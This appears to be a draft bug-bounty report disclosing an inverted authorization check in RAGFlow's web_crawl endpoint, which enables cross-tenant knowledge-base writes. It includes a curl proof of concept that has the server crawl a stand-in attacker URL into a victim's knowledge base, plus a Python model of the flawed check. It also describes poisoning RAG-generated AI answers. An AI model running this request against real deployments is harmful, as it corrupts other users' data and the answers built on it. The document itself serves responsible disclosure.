# Inverted Authorization Check in `web_crawl` Endpoint Allows Cross-Tenant Knowledge Base Write

## meta

platform: huntr
program: RAGFlow
asset: https://github.com/infiniflow/ragflow
date: 2026-02-12
status: DRAFT

````
Repository URL: https://github.com/infiniflow/ragflow
Package Manager: pip
Version Affected: 0.24.0
Vulnerability Type: Incorrect Authorization

CVSS:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Confidentiality: None
- Integrity: High
- Availability: High

Title: Inverted authorization check in web_crawl allows cross-tenant knowledge base write

Description:

# Description

The `web_crawl` endpoint in `api/apps/document_app.py` contains an inverted authorization check at line 116. The correct pattern (used in the `upload` function at line 86) is:

    if not check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

The `web_crawl` function is missing the `not` keyword:

    if check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

Since `check_kb_team_permission()` returns `True` when the user IS authorized (owner or team member), this inverted logic:

- **Denies** authorized users (owner, team members)
- **Allows** unauthorized users (any other authenticated user)

After the check incorrectly passes, the function proceeds to crawl the attacker-supplied URL via `html2pdf()`, store the result in the victim's storage, insert a document record, and link it to the victim's tenant.

# Proof of Concept

## Prerequisites

- RAGFlow instance with two user accounts (attacker + victim)
- Victim has a knowledge base with known `kb_id`

## Steps

```bash
# Attacker injects document into victim's knowledge base
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${ATTACKER_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=injected_document" \
  -F "url=https://attacker.example.com/malicious-content.html"
# Returns: {"code": 0, "data": true} (should be 401)

# Legitimate owner is BLOCKED from their own KB
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${VICTIM_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=legitimate_document" \
  -F "url=https://example.com/content.html"
# Returns: {"code": 401, "data": false, "message": "No authorization."} (should succeed)
```

Impact:

This vulnerability allows any authenticated user to inject documents into any other user's knowledge base by exploiting an inverted authorization check. Injected documents are indexed by the RAG pipeline, enabling data poisoning of AI-generated responses. The inverted check also blocks legitimate owners from using `web_crawl` on their own knowledge bases.

Occurrences:

- Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L116
  Description: Missing `not` keyword. `if check_kb_team_permission(kb, current_user.id):` denies authorized users and allows unauthorized users. Compare with the correct pattern at line 86: `if not check_kb_team_permission(kb, current_user.id):`.
- Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/common/check_team_permission.py#L25-L37
  Description: `check_kb_team_permission()` returns `True` for authorized users (owner or team member). The missing `not` at the call site inverts the logic.

References:

- https://cwe.mitre.org/data/definitions/863.html (CWE-863: Incorrect Authorization)
- https://owasp.org/Top10/A01_2021-Broken_Access_Control/ (OWASP A01:2021)
- https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ (OWASP API1:2023)
````
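
The inverted logic described in the report can be illustrated with a small, self-contained model. This is only a sketch and does not use RAGFlow's code. The `Kb` dataclass and the `guard_inverted` / `guard_correct` helpers are hypothetical names introduced for illustration. `check_kb_team_permission` here is a stub that assumes only what the report states: it returns `True` for the owner or a team member. Each guard returns `True` when the request would be allowed to proceed.

```python
from dataclasses import dataclass, field


@dataclass
class Kb:
    """Hypothetical stand-in for a knowledge base record (not RAGFlow's model)."""
    owner_id: str
    team_member_ids: set = field(default_factory=set)


def check_kb_team_permission(kb: Kb, user_id: str) -> bool:
    """Stub: True when the user is the owner or a team member, as the report describes."""
    return user_id == kb.owner_id or user_id in kb.team_member_ids


def guard_inverted(kb: Kb, user_id: str) -> bool:
    """Models the reported web_crawl check (missing `not`)."""
    if check_kb_team_permission(kb, user_id):
        return False  # authorized user is rejected with "No authorization."
    return True       # unauthorized user falls through to the crawl


def guard_correct(kb: Kb, user_id: str) -> bool:
    """Models the pattern the report attributes to the upload function."""
    if not check_kb_team_permission(kb, user_id):
        return False  # unauthorized user is rejected
    return True       # authorized user proceeds


kb = Kb(owner_id="victim", team_member_ids={"teammate"})
for user in ("victim", "teammate", "attacker"):
    print(f"{user}: inverted={guard_inverted(kb, user)} correct={guard_correct(kb, user)}")
```

Under these assumptions the two guards disagree for every user: the inverted guard admits only the attacker, while the corrected guard admits only the owner and the teammate. A regression test for a fix could assert that same table against the real endpoint.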